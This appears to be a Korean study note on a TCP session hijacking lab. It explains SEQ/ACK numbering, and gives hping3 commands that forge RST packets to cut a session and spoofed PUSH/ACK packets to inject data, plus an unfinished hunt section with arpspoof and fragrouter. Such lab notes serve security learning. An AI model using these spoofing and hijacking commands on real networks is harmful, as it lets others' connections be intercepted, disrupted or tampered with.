Session hijaking(세션 하이재킹, hping3, hunt)

Sessoin Hijaking

: 공격 대상이 시스템에 접속해 세션이 연결되어 있는 상태를 가로채기하는 공격

​

TCP의 데이터 송수신 과정

​

1. Client가 다시 요청 시엔 SEQ번호와 ACK번호가 그대로이다.

2. Server가 요청 받을 때 SEQ번호는 받은 ACK번호가 된다.

3. Client의 ACK번호는 받은 SEQ번호 + 데이터크기

​

ex)

1 - Flag : PUSH + ACK : Client

S:101 A:2001 ( 연결 수립 과정 중 3way 부분의 값을 그대로 사용 )

​

2 - Flag : PUSH + ACK : Server

S:2001 A:201 ( S : 1번의 A값, A : 1번 S값 + 보내는 데이터 )

​

3 - Flag : ACK : Client

S:201 A:2501 ( S : 2번의 A값, A : 2번의 S값 + 받는 데이터 )

​

​

Hacker	192.168.10.6 (Kali Linux)
Target1	192.168.10.8 (Windows 7)
Target2	192.168.10.1 (Windows XP)

netcat이라는 프로그램을 사용해 Target 간의 연결을 수립한다.

netcat 연결 수립

​

서로의 통신을 Sniffing한 모습

​

실제 Seq, Ack번호

​

​

​

세션을 탈취해 연결을 끊어보기(Reset Flag)

# hping3 -a [S_IP] [D_IP] -s [S_Port] -p [C_Port] -M [마지막 통신 Ack번호] -R -A -c 1

​

끊겼다.

​

​

​

세션을 탈취해 서버인척 데이터를 전송하기(Push, Ack Flag)

# hping3 -a [S_IP] [D_IP] -s [S_Port] -p [D_Port] -M [Seq Num] -L [ACK Num] -P -A -c 1 -d [보낼 데이터 크기 + 1(Null)] -E [file]

​

보낼 파일

송신

​

위와 같은 경우 Ack Storm 발생 (Client와 Server 간 동기화가 적절치 않아서)

​

​

hunt를 이용한 Telnet Session Hijaking --미완성

Tool Install - Hacker # apt-get install hunt -y ​ ARP Spoof - Hacker # arpspoof -t 192.168.10.1 192.168.10.8 # arpspoof -t 192.168.10.8 192.168.10.1 # fragrouter -B1 ​ Telnet Connect - Target 1 ​